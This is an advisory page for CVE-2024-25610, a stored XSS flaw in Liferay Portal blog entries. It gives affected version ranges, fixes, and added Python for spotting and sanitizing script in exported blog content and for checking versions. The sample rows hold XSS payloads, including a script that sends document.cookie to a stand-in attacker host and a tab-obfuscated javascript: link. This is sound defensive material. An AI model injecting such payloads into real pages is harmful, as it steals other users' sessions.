CVE-2024-25610
Liferay Portal has a Stored XSS with Blog entries (Insecure defaults)
9.0
CRITICAL
CVSS 3.1
EPSS 0.11%
Description
In Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field.
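The flaw is that blog entry content reaches the renderer with script-bearing HTML intact. The following Python is an added example, not Liferay code: it shows a triage pass over exported blog entries that flags what a browser would execute (script-type elements, `on*` handlers, URL attributes with an executable scheme) and, beside it, an allowlist sanitizer of the kind the default configuration lacked. The `BlogsEntry`-shaped rows are constructed sample data, and the export format (entryId, content) is an assumption.

```python
"""Triage helper for stored XSS of the CVE-2024-25610 kind (script in blog HTML).

Added example; this is not Liferay code. It assumes blog content has been
exported as (entryId, content) pairs, e.g. from the BlogsEntry table, and
uses constructed sample rows so it runs offline.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample rows shaped like Liferay BlogsEntry (entryId, content).
SAMPLE_ENTRIES = [
    (1001, "<p>Release notes for Q3.</p>"),
    (1002, "<p>Hi</p><script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>"),
    (1003, '<img src="x" onerror="alert(document.domain)">'),
    (1004, '<a href="java\tscript:alert(1)">click</a>'),
    (1005, '<a href="https://example.invalid/docs">docs</a>'),
]

DANGEROUS_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "img", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}


def _safe_url(value):
    """Reject javascript:, data:, vbscript: and similar schemes. Tabs and
    newlines are removed first because browsers ignore them inside a scheme
    ("java<TAB>script:")."""
    cleaned = re.sub(r"[\t\n\r]", "", value or "").strip().lower()
    return urlsplit(cleaned).scheme in ("", "http", "https", "mailto")


class _PayloadFinder(HTMLParser):
    """Collects what a renderer would execute: script-bearing tags, on* handlers,
    and URL attributes with an executable scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and not _safe_url(value):
                self.findings.append(f"unsafe URL scheme in {name} on <{tag}>")


class _Sanitizer(HTMLParser):
    """Allowlist serializer: keeps only ALLOWED_TAGS/ALLOWED_ATTRS, drops the
    body of DANGEROUS_TAGS entirely, and re-escapes all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped <script>/<iframe>/...

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DANGEROUS_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in ("br", "img"):
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def find_script_payloads(content):
    parser = _PayloadFinder()
    parser.feed(content)
    parser.close()
    return parser.findings


def sanitize(content):
    parser = _Sanitizer()
    parser.feed(content)
    parser.close()
    return "".join(parser.out)


def triage(entries):
    """Map entryId -> findings for every entry that carries script."""
    return {eid: f for eid, body in entries if (f := find_script_payloads(body))}


if __name__ == "__main__":
    for eid, findings in triage(SAMPLE_ENTRIES).items():
        print(eid, findings, "->", sanitize(dict(SAMPLE_ENTRIES)[eid]))
```

Run `triage` over a real export to scope which entries (and therefore which authors) carry payloads; `sanitize` is deliberately an allowlist rather than a blocklist, because a blocklist has to enumerate every handler attribute and scheme obfuscation, while an allowlist only has to name the markup a blog post legitimately needs.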
How to fix CVE-2024-25610
To remediate CVE-2024-25610, upgrade each affected package to its fixed version below (the three fixed versions correspond, in order, to the three ranges listed under Affected packages).
- upgrade to 5.0.96 or later
- upgrade to 7.4.13.u9 or later
- upgrade to 7.4.3.13 or later
Is CVE-2024-25610 being exploited?
Low. The EPSS score is 0.11%, a low predicted probability of exploitation in the wild over the next 30 days. EPSS is a prediction, not an observation, so a low score is not evidence that the flaw is unexploited: this is a stored XSS reachable in the default configuration by any authenticated user who can author or edit a blog entry, and the payload runs in the browser of every user who views the entry.
Affected packages (3)
- all versions < 5.0.96
- >= 7.4.0, < 7.4.13.u9
- all versions < 7.4.3.13
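Checking a deployment against these ranges by hand is error-prone because Liferay DXP's update notation ("7.4.13.u9") does not sort as a plain dotted version. The following Python is an added example, not Liferay tooling: it parses Portal CE versions and the DXP update form, treats a base release with no update number as update 0, and tests a version against one of the three ranges above. The page does not name the package behind each range, so the caller selects the range that belongs to the package being checked; the acceptance of a `-` separator ("7.4.13-u9") is an assumption, and fix pack or service pack strings are rejected rather than guessed.

```python
"""Version check against the ranges this page lists for CVE-2024-25610.

Added example, not Liferay tooling. It understands Liferay Portal CE versions
("7.4.3.12") and the DXP update notation ("7.4.13.u9", or "7.4.13-u9" as an
assumed variant); fix pack and service pack strings raise ValueError.
"""
import re

# The three ranges exactly as listed under "Affected packages": (introduced, fixed).
RANGES = {
    "< 5.0.96": ("0", "5.0.96"),
    ">= 7.4.0, < 7.4.13.u9": ("7.4.0", "7.4.13.u9"),
    "< 7.4.3.13": ("0", "7.4.3.13"),
}

# A component is either a plain integer or a DXP update number such as "u9".
_PART = re.compile(r"^u?(\d+)$")


def parse_version(text):
    """'7.4.13.u9' -> (7, 4, 13, 9); '7.4.13' -> (7, 4, 13, 0).

    A missing update number is treated as update 0 (an unpatched base
    release); tuples are zero-padded to four slots so they compare directly.
    """
    parts = text.strip().lower().replace("-", ".").split(".")
    nums = []
    for part in parts:
        match = _PART.match(part)
        if not match:
            raise ValueError(f"unsupported version component {part!r} in {text!r}")
        nums.append(int(match.group(1)))
    if len(nums) > 4:
        raise ValueError(f"too many components in {text!r}")
    return tuple(nums + [0] * (4 - len(nums)))


def is_affected(version, range_key):
    """True if version lies in [introduced, fixed) for the chosen page range."""
    introduced, fixed = RANGES[range_key]
    v = parse_version(version)
    return parse_version(introduced) <= v < parse_version(fixed)


if __name__ == "__main__":
    for version, key in [
        ("7.4.3.12", "< 7.4.3.13"),
        ("7.4.3.13", "< 7.4.3.13"),
        ("7.4.13", ">= 7.4.0, < 7.4.13.u9"),
        ("7.4.13.u9", ">= 7.4.0, < 7.4.13.u9"),
        ("7.4.13.u10", ">= 7.4.0, < 7.4.13.u9"),
    ]:
        print(f"{version:12} in {key!r:26} affected={is_affected(version, key)}")
```

Note that "7.4.13" with no update suffix is reported as affected: a DXP 7.4 base install is update 0, which is below update 9. Versions that do not parse (for example a 7.2 fix pack string) are refused rather than silently compared, since a false "not affected" is the costly error here.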
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL (9.0) | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H |